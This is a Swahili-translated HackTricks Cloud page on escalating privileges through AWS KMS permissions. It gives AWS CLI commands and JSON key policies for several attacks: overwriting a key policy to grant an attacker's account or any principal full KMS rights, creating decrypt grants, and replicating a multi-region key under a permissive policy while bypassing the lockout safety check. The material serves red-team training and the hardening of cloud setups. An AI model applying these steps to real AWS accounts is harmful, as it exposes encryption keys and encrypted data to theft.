HackTricks CloudAWS - KMS Privesc
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
KMS
Kwa maelezo zaidi kuhusu KMS angalia:
kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)
Kwa ruhusa hizi inawezekana kubadilisha ruhusa za ufikiaji kwa funguo ili iweze kutumika na akaunti nyingine au hata mtu yeyote:
aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json
policy.json:
{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<origin_account>:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow all use",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": ["kms:*"],
"Resource": "*"
}
]
}
kms:CreateGrant
Inaruhusu kiongozi kutumia funguo ya KMS:
aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt
warning
Utoaji unaweza kuruhusu aina fulani tu za operesheni: https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations
warning
Kumbuka kwamba inaweza kuchukua dakika chache kwa KMS kuruhusu mtumiaji kutumia ufunguo baada ya utoaji kuzalishwa. Mara muda huo utakapopita, kiongozi anaweza kutumia ufunguo wa KMS bila kuhitaji kubainisha chochote.
Hata hivyo, ikiwa inahitajika kutumia utoaji mara moja tumia token ya utoaji (angalia msimbo ufuatao).
Kwa maelezo zaidi soma hii.
# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
–-key-spec AES_256 \
--grant-tokens $token
Kumbuka kwamba inawezekana kuorodhesha ruhusa za funguo kwa:
aws kms list-grants --key-id <value>
kms:CreateKey, kms:ReplicateKey
Kwa ruhusa hizi inawezekana kuiga funguo ya KMS iliyo na uwezo wa mikoa mingi katika eneo tofauti na sera tofauti.
Hivyo, mshambuliaji anaweza kutumia hii kupata privesc ufikiaji wake kwa funguo na kuifanya.
aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml
{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}
kms:Decrypt
Ruhusa hii inaruhusu kutumia ufunguo kufungua baadhi ya taarifa.
Kwa maelezo zaidi angalia:
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.